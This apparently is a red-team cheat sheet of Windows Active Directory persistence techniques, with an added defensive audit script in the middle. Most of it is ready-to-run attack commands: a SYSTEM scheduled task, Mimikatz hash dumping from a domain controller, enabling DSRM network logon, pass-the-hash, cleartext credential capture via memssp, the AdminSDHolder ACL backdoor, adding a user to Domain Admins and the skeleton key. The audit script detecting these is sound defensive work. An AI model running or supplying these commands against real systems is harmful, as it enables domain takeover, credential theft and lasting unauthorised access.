xct's notes
Persistence

Scheduled Task

schtasks /create /tn "xct" /ru "SYSTEM" /tr "c:\temp\xct.exe" /sc DAILY
schtasks /run /tn "xct"
schtasks /query /tn "xct" /FO list /v
schtasks /delete /tn "xct" /f

WMI Subscriptions (Covenant)

Run the "PersistWMI" task; the payload executes alongside another program, e.g. when the victim opens Chrome, our persistence calls back.

DSRM

The Directory Services Restore Mode password is only needed when promoting a DC, so it is rarely used or changed; we either obtain it or change it:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <dc>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <dc>
# Compare the hashes; the first one is the DSRM account
# We can pass-the-hash into the DC with the NTLM hash of the DSRM account, but first we have to change its logon behaviour
Enter-PSSession -Computername <dc>
# Value name is DsrmAdminLogonBehavior (US spelling); 2 = DSRM account may log on at any time
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# Pass-the-hash into it
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<hash> /run:powershell.exe"'

Custom SSP

A custom Security Support Provider installed with mimikatz (mimilib.dll) logs all passwords in cleartext:
Invoke-Mimikatz -Command '"misc::memssp"'
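Defender-side counterpart to the Scheduled Task, DSRM and Custom SSP sections above, as an added example that is not part of xct's notes: a PowerShell audit to run elevated on a domain controller. The list of expected SSP names and the user-writable path pattern are assumptions for a default build; adjust them to your own baseline.

```powershell
# Added audit script (not from the original notes). Run as administrator on a DC.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$findings = @()

# 1. DSRM logon behaviour: absent/0 = DSRM account usable only in DSRM (default),
#    1 = usable while AD DS is stopped, 2 = usable at any time (the value set in the notes).
$dsrm = (Get-ItemProperty -Path $lsa -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
if ($dsrm -ge 1) { $findings += "DsrmAdminLogonBehavior is $dsrm (expected absent or 0)" }

# 2. Registered SSPs: a persistent custom SSP such as mimilib.dll is added to this list.
#    Assumed baseline of built-in package names for a default DC.
$expectedSsp = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')
$ssp = (Get-ItemProperty -Path $lsa -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
foreach ($p in $ssp) {
    if ($p -and ($expectedSsp -notcontains $p.ToLower())) {
        $findings += "Unexpected SSP registered: $p"
    }
}
# misc::memssp patches LSASS in memory and leaves no registry entry; by default it writes
# captured credentials to mimilsa.log in System32, so check for that file instead.
if (Test-Path "$env:SystemRoot\System32\mimilsa.log") {
    $findings += 'mimilsa.log present in System32 (memssp artifact)'
}

# 3. Scheduled tasks that run as SYSTEM from user-writable locations (e.g. c:\temp above).
Get-ScheduledTask | Where-Object { $_.Principal.UserId -eq 'SYSTEM' } | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        # Only exec actions carry an Execute path; -match is case-insensitive by default
        if ($a.Execute -match '^c:\\(temp|users)\\') {
            $findings += "SYSTEM task '$($task.TaskName)' runs $($a.Execute)"
        }
    }
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } } else { Write-Output 'No findings' }
```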

AdminSDHolder

Grants a user full rights on the AdminSDHolder object, which SDProp then propagates to protected groups such as Domain Admins (PowerView):
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose
$session = New-PSSession -ComputerName <dc>
Invoke-Command -FilePath .\Invoke-SDPropagator -Session $session
Enter-PSSession -Session $session

Add user to domain admins

Add-DomainGroupMember -Identity 'Domain Admins' -Members <user> -Verbose

Skeleton Key

# This lets you log into every account with the password "mimikatz"; you should compile it yourself and change that. You might also need to remove LSASS process protection before running it.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <name>

AppInit DLLs

Persistence – AppInit DLLs (Penetration Testing Lab)

NetSH Persistence

3gstudent-Blog

Universal Password Backdoors with Frida

SensePost | Recreating known universal windows password backdoors with frida